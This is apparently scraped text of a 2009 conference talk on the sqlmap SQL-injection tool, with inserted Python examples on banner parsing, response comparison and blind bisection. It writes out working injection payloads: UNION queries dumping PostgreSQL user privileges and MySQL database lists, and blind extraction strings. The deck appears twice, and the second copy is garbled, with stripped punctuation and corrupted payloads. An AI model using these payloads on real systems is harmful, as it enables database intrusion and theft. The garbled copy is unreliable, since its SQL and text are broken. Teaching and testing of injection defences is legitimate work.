Back-end DBMS operating system, by parsing the DBMS banner: over-looked technique.
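The banner-parsing idea above, as an added example that is not sqlmap's code: a small parser that pulls DBMS product, version, service pack and operating-system hints out of the strings returned by MySQL's VERSION(), PostgreSQL's version() and SQL Server's @@VERSION. The three sample banners are constructed for the example (they follow the real layouts but were not captured from any system), the SQL Server 2005 build-to-service-pack table lists the four well-known builds, and the regular expressions are this example's own, so a banner with a different layout simply yields None fields.

```python
import re

# Constructed sample banners (not captured from any real system). Their layout
# follows what MySQL's VERSION(), PostgreSQL's version() and SQL Server's
# @@VERSION return, which is what sqlmap parses.
SAMPLE_BANNERS = {
    "mysql": "5.0.51a-3ubuntu5.4",
    "postgresql": ("PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC "
                   "gcc-4.3.real (Debian 4.3.2-1) 4.3.2"),
    "mssql": ("Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n"
              "\tOct 14 2005 00:33:37 \n"
              "\tCopyright (c) 1988-2005 Microsoft Corporation\n"
              "\tExpress Edition on Windows NT 5.2 (Build 3790: Service Pack 2)\n"),
}

# SQL Server 2005 build numbers and the service pack level they correspond to.
# The trailing "Service Pack N" in @@VERSION refers to Windows, not to SQL Server.
MSSQL_2005_BUILDS = {"1399": "Service Pack 0", "2047": "Service Pack 1",
                     "3042": "Service Pack 2", "4035": "Service Pack 3"}

# Linux distributions that tag their MySQL package version (e.g. 5.0.51a-3ubuntu5).
DISTRO_TAGS = ("ubuntu", "debian", "fedora", "suse", "mandriva")


def parse_banner(banner):
    """Derive DBMS, version, service pack and OS hints from a DBMS banner."""
    info = {"dbms": None, "version": None, "service_pack": None, "os": None}

    # Microsoft SQL Server: "<product> <year> - <major>.<minor>.<build>..."
    m = re.search(r"Microsoft SQL Server (\d{4}) - (\d+)\.(\d+)\.(\d+)", banner)
    if m:
        info["dbms"] = "Microsoft SQL Server " + m.group(1)
        info["version"] = "%s.%s.%s" % (m.group(2), m.group(3), m.group(4))
        if m.group(2) == "9":                      # 9.x is SQL Server 2005
            info["service_pack"] = MSSQL_2005_BUILDS.get(m.group(4))
        os_m = re.search(r"on Windows NT (\d+\.\d+)", banner)
        if os_m:
            info["os"] = "Windows NT " + os_m.group(1)
        return info

    # PostgreSQL: "PostgreSQL <version> on <compile target>, compiled by ..."
    m = re.search(r"PostgreSQL (\d+\.\d+(?:\.\d+)?) on (\S+)", banner)
    if m:
        info["dbms"] = "PostgreSQL"
        info["version"] = m.group(1)
        target = m.group(2).lower()                # e.g. i486-pc-linux-gnu
        if "linux" in target:
            info["os"] = "Linux"
        elif "mingw" in target or "win" in target:
            info["os"] = "Windows"
        distro = re.search(r"\((Debian|Ubuntu|Red Hat|SUSE)[^)]*\)", banner)
        if distro and info["os"] == "Linux":
            info["os"] = "Linux (%s)" % distro.group(1)
        return info

    # MySQL: "<version>[-<package suffix>]", the suffix often names the distro.
    m = re.match(r"(\d+\.\d+\.\d+[a-z]?)(?:-(\S+))?$", banner.strip())
    if m:
        info["dbms"] = "MySQL"
        info["version"] = m.group(1)
        suffix = (m.group(2) or "").lower()
        for tag in DISTRO_TAGS:
            if tag in suffix:
                info["os"] = "Linux (%s)" % tag.capitalize()
                break
        else:
            if suffix.endswith("nt") or "win" in suffix:
                info["os"] = "Windows"
        return info

    return info


if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        print(name, parse_banner(banner))
```

The same parser is useful on the defending side: run it over the banners your own applications expose in error pages to see exactly how much platform detail leaks without any extra request.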
Second demo
"A demo, as in demolish or demonstration?" (Cyclops, X-Men Evolution)
Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output.
If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them.
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' datatypes, etc.
There is an option to dump the whole back-end DBMS.
Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line and/or configuration file.
Options are documented in the user's manual with examples.
Third demo
"I get tons of uninteresting mail and system announcements about babies born, etc. At least a demo MIGHT have been interesting." (Richard Stallman)
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
SQL injection on SQL clauses other than WHERE
Time-based blind SQL injection technique
...but I am working on these and others.
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com
References
OWASP Testing Guide, Open Web Application Security Project
Exploit of a Mom, xkcd
Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework, H D Moore and the Metasploit development team
w3af, Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
Python difflib, Python Software Foundation
NULL (SQL), Wikipedia
Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection, Bernardo Damele A G
DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Questions?
Thanks for your attention
sqlmap
sqlmap is an automatic SQL injection tool.
Developed in Python. Started in July 2006, initially by Daniele Bellucci, then I took over in December 2006.
Licensed under the terms of GPLv2.
Detects and takes advantage of SQL injection vulnerabilities in web applications. The user can choose to:
Perform an extensive back-end DBMS fingerprint
Enumerate users, password hashes, privileges, databases, tables, columns and their datatypes
Dump entire or user-specified database tables' entries
Run custom SQL statements and more
sqlmap features (1/2)
sqlmap key features:
Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques:
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target acquisition from the user, by parsing WebScarab/Burp proxies' request log files, by Google dorking
Tests for injection flaws on GET and POST parameters, HTTP User-Agent header and Cookie values
sqlmap features (2/2)
More features:
Silent to verbose output messages
Granularity in the user's options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line and/or configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing your own queries, depending on the session user privileges and back-end DBMS
Real world
"Have you ever had a dream, Neo, that you were so sure was real? What if you were unable to wake from that dream? How would you know the difference between the dream world and the real world?" (Morpheus, The Matrix)
Dealing with advertisements (1/3)
In the real world web applications are often complex.
Usually the page content changes at each refresh.
They have inline counters, advertisement banners, clocks, etc.
The inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query.
Dealing with advertisements (2/3)
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh, then the algorithm may not work.
Dealing with advertisements (3/3)
The Python difflib library helped to solve this problem: for each HTTP response, sqlmap calls a function that compares the returned page content with the untouched original page content.
It returns a measure of the page contents' similarity as a float in the range [0, 1], rounded to 3 decimal places.
It works also when the original page is stable but the page returned for the injected query with a valid condition (True) differs.
If the automatic comparison fails, the user can provide a string or a regular expression that matches on both the original and True page contents and does not match on False page contents.
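The comparison step on these three slides, as an added example (not sqlmap's own code): a True/False oracle built on difflib's SequenceMatcher, plus the string/regex override for the cases where the ratio alone does not separate the two page variants. The three pages are constructed for the example; the ad banner and clock change on every "request" while only the product block depends on the query. The 0.95 threshold is an assumption sized for these tiny pages, not sqlmap's setting; on a real page a few changed characters out of tens of kilobytes barely move the ratio, so the threshold can sit much closer to 1.

```python
import difflib
import re

# Constructed sample pages (not real responses). The ad banner and the clock
# change on every request; only the product block reflects the SQL result.
ORIGINAL_PAGE = """<html><body>
<div id="ad">ad-campaign-4821</div><div id="clock">12:00:01</div>
<div id="product">Product 1: Widget (in stock)</div>
</body></html>"""

# Same page fetched a moment later: the dynamic parts differ, the data does not.
REFRESHED_PAGE = (ORIGINAL_PAGE
                  .replace("ad-campaign-4821", "ad-campaign-9917")
                  .replace("12:00:01", "12:00:07"))

# What the page looks like when the injected condition is False: the WHERE
# clause matched nothing, so the product block is replaced by a notice.
FALSE_PAGE = REFRESHED_PAGE.replace("Product 1: Widget (in stock)", "No product found")

# Assumed similarity threshold for this example (sized for these small pages).
MATCH_RATIO = 0.95


def page_ratio(original, candidate):
    """Similarity of two page bodies as a float in [0, 1], 3 decimal places.
    ratio() is 2*M/T, M being the matched characters and T the total length;
    quick_ratio() is a cheaper upper bound that only compares character counts."""
    return round(difflib.SequenceMatcher(None, original, candidate).ratio(), 3)


def is_true_response(original, candidate, threshold=MATCH_RATIO, pattern=None):
    """Oracle verdict for one response.
    Without a pattern: True when the page is still close enough to the original
    despite the banner and the clock having changed.
    With a pattern (string or regex): True only when it matches the candidate,
    which is the manual override for pages the ratio cannot classify."""
    if pattern is not None:
        return re.search(pattern, candidate) is not None
    return page_ratio(original, candidate) >= threshold


if __name__ == "__main__":
    # Plain equality is useless on a dynamic page: the refreshed page is never
    # byte-identical to the original even though the data is the same.
    print("identical bytes:", ORIGINAL_PAGE == REFRESHED_PAGE)
    print("refresh ratio:", page_ratio(ORIGINAL_PAGE, REFRESHED_PAGE))
    print("false ratio:  ", page_ratio(ORIGINAL_PAGE, FALSE_PAGE))
    print("refresh is True:", is_true_response(ORIGINAL_PAGE, REFRESHED_PAGE))
    print("false is True:  ", is_true_response(ORIGINAL_PAGE, FALSE_PAGE))
    print("regex override:", is_true_response(ORIGINAL_PAGE, FALSE_PAGE, pattern=r"in stock"))
```

The same comparison is what makes this class of probing visible on the defending side: an inferential blind attack is a long run of requests to one parameter whose responses alternate between just two page shapes, which is a pattern a WAF or log review can key on.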
To NULL or not to NULL (1/4)
In standard SQL language NULL is allowed as a value for a table column field.
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher than a certain ASCII table number; this causes the page content to be True or False.
The SQL statement used by sqlmap, depending on the back-end DBMS, is similar to:
ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number
To NULL or not to NULL (2/4)
Obstacle
On some DBMS the substring function can not be used on NULL.
To NULL or not to NULL (3/4)
A possible solution for this problem consists in modifying all the SQL query's columns explicitly:
Casting its output to be a string
Returning the value ' ' (space) if the casted value is still NULL
Example on MySQL 5.0. The SQL query to enumerate the column name's first entry is:
SELECT name FROM test.users LIMIT 0, 1
Casted SQL query:
SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1
To NULL or not to NULL (4/4)
The inferential blind SQL injected statement will then be:
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1), Nth SQL query output character, 1)) > Bisection algorithm number
URL encoded:
ORD%28MID%28%28SELECT%20IFNULL%28CAST%28name%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%20FROM%20test.users%20LIMIT%200%2C%201%29%2C%201%2C%201%29%29%20%3E%2063
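To see why the cast matters, here is the bisection the four slides describe, run against an in-memory SQLite database. This is an added example, not sqlmap's code: SQLite's UNICODE/SUBSTR/IFNULL/CHAR stand in for MySQL's ORD/MID/IFNULL/CHAR, the users table and its three rows are constructed, and the oracle answers each True/False question locally instead of through the page comparison of the previous slides. One difference is worth knowing: SQLite returns NULL rather than raising an error when SUBSTR or LENGTH is applied to NULL, so here the failure shows up as a NULL entry that is indistinguishable from an empty string, not as the error some DBMS give.

```python
import sqlite3


def make_db():
    """Constructed sample data; SQLite plays the back-end DBMS."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(1, "alice"), (2, None), (3, "bob")])
    return con


class Oracle:
    """Answers one question per request: is the injected condition True?
    In the real technique the answer comes from comparing the HTTP response
    with the original page; here the condition is evaluated locally."""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return self.con.execute("SELECT 1 WHERE " + condition).fetchone() is not None


def casted_query(column, table, entry):
    """The slide's rewrite: cast the column to a string and substitute a
    space (CHAR(32)) when the value is NULL, so SUBSTR never sees NULL."""
    return ("SELECT IFNULL(CAST(%s AS CHAR(10000)), CHAR(32)) FROM %s LIMIT %d, 1"
            % (column, table, entry))


def bisect_char(oracle, subquery, position, lo=0, hi=127):
    """Bisection over the ASCII range. Each question is 'is the ordinal of
    character <position> greater than <mid>?'. Invariant: lo < value <= hi,
    so seven questions pin down one printable character."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle.ask("UNICODE(SUBSTR((%s), %d, 1)) > %d" % (subquery, position, mid)):
            lo = mid
        else:
            hi = mid
    return hi


def fetch_value(oracle, subquery, max_len=64):
    """Retrieve the whole single-cell output, one character at a time."""
    out = ""
    for position in range(1, max_len + 1):
        # One extra question per character: is there a character at this position?
        # LENGTH(NULL) is NULL, so an uncasted NULL cell stops here immediately.
        if not oracle.ask("LENGTH((%s)) >= %d" % (subquery, position)):
            break
        out += chr(bisect_char(oracle, subquery, position))
    return out


def demo():
    oracle = Oracle(make_db())
    plain = "SELECT name FROM users LIMIT 1, 1"            # second entry: NULL
    results = {
        "plain_null": fetch_value(oracle, plain),         # NULL reads as '' here
        "cast_null": fetch_value(oracle, casted_query("name", "users", 1)),
        "cast_first": fetch_value(oracle, casted_query("name", "users", 0)),
        "cast_third": fetch_value(oracle, casted_query("name", "users", 2)),
    }
    return results, oracle.requests


if __name__ == "__main__":
    results, requests = demo()
    print(results, "in", requests, "requests")
```

The request counter is the practical takeaway: eight requests per character (seven for the bisection plus the length check) is why blind extraction of even a short column produces a long burst of near-identical requests, and why a NULL cell that silently stops the loop can quietly truncate a dump.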
SQL payload (1/3)
You have got an injection point.
The injection point is in a SQL statement as follows:
SELECT * FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0, 1
SQL payload (2/3)
Obstacle
The injection is after a LIKE clause, within three parentheses; the statement terminates with a LIMIT clause.
SQL payload (3/3)
In this example the SQL payload that sqlmap identifies is:
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm it will be:
id=1))) AND ORD(MID((SQL query), Nth SQL query output character, 1)) > Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique it will be:
id=1))) UNION ALL SELECT NULL, Concatenated SQL query, NULL AND (((RaNd LIKE RaNd
First demo
"I did every demo possible to see if the things would do what they were promising they would do." (Doug Hall)
Bypass columns limitation (1/4)
You have got an injection point.
It is vulnerable to UNION query SQL injection.
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing, depending on your options.
Bypass columns limitation (2/4)
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement.
Bypass columns limitation (3/4)
A possible solution consists in concatenating your SELECT statement's columns into a single output by using the specific DBMS string concatenation operator or function.
Example on PostgreSQL 8.3 to retrieve users' privileges.
The SQL query to inject is:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
Bypass columns limitation (4/4)
The injection will be:
UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--
Going partial UNION (1/3)
Obstacle
You have got an injection point vulnerable to UNION query SQL injection. Only the query output's first entry, or a range of entries, is displayed in the page content.
Going partial UNION (2/3)
sqlmap automates a known technique:
Changes the parameter value to its negative value, causing the original query to produce no output
Inspects and unpacks the provided SQL statement
Calculates its output's number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeats the previous action N times, where N is equal to the number of entries
Going partial UNION (3/3)
Example on MySQL 4.1 to enumerate the list of databases.
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as being a non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario).
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
